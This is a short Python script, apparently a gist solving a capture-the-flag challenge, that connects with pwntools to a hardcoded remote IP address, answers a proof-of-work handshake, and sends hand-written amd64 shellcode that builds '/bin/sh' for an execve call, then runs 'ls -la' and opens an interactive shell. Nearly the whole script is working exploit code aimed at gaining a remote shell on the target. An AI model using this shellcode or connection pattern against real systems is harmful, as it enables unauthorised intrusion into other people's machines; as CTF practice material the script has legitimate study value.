@kokjo
Created December 29, 2019 20:08
#!/usr/bin/env python
from pwn import *
from subprocess import Popen, PIPE
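context(arch='amd64', os='linux', terminal=['sakura','-x'])

# --- Stage 1: proof-of-work handshake ---------------------------------------
# The service sends a quoted hash and a line of the form "... ends with <num> ...".
# Both values come from the remote peer and are therefore untrusted input.
r = remote("78.46.163.223", 1336)
r.recvuntil('"')
hsh = r.recvuntil('"')[:-1]            # text between the two quotes
r.recvuntil("ends with ")
num = r.recvuntil(' ')                 # int() below rejects anything non-numeric
r.recvline()

# Guard against argument injection into the solver: an empty hash or one that
# starts with '-' would be parsed as an option.  The exact hash alphabet is not
# visible here (TODO: confirm whether it is hex and tighten to [0-9a-fA-F]+).
if not hsh or hsh.startswith('-'):
    raise ValueError("refusing suspicious PoW hash from server: %r" % hsh)

# Run the local solver with an argv list and no shell.  The previous
# '"./pow-solver %d %s" % (...)' with shell=True let a malicious or compromised
# server inject shell metacharacters through `hsh`.
proc = Popen(["./pow-solver", str(int(num)), hsh], stdout=PIPE)
res = proc.stdout.readline()           # the solver's first output line is the answer
proc.stdout.close()
if proc.poll() is None:
    proc.terminate()                   # answer already read; don't leave it running
proc.wait()                            # reap the child (the original never did)
answer = res.strip()
if not answer:
    raise RuntimeError("pow-solver produced no output for hash %r" % hsh)
r.sendline(answer)

# --- Stage 2: shellcode -----------------------------------------------------
magic = 0x3A248CA1                     # NOTE: not referenced by the code below; kept as-is
# The stub writes "/bin/sh" into memory at edi (stosw/stosd/stosb) and then
# pops registers and adds 0x3b (execve) to al.  No `syscall` instruction is
# present in this stub, so presumably the challenge supplies it; the nops and
# byte-at-a-time register moves look like constraints of the target filter
# (TODO: confirm against the challenge).
shellcode = asm('''
xor edi, eax
mov cl, 16
mov bl, 0x24
mov bh, 0x3a
rol ebx, cl
xor edi, ebx
mov esp, edi
mov al, 0x2f
mov ah, 0x62
stosw
mov ah, 0x73
shl eax, cl
mov al, 0x69
mov ah, 0x6e
stosd
cdq
mov al, 0x68
stosb
nop
mov edi, esp
pop rax
pop rax
pop rsi
nop
add al, 0x3b
''')
MAX_SHELLCODE_LEN = 42                 # size the payload is padded to; presumably the service's limit
if len(shellcode) > MAX_SHELLCODE_LEN:
    # ljust() silently leaves an over-long payload untouched; fail loudly instead.
    raise ValueError("shellcode is %d bytes, limit is %d"
                     % (len(shellcode), MAX_SHELLCODE_LEN))
shellcode = shellcode.ljust(MAX_SHELLCODE_LEN, '\x90')   # pad with NOPs
print(shellcode)
r.sendline(shellcode)
r.sendline("ls -la")
r.interactive()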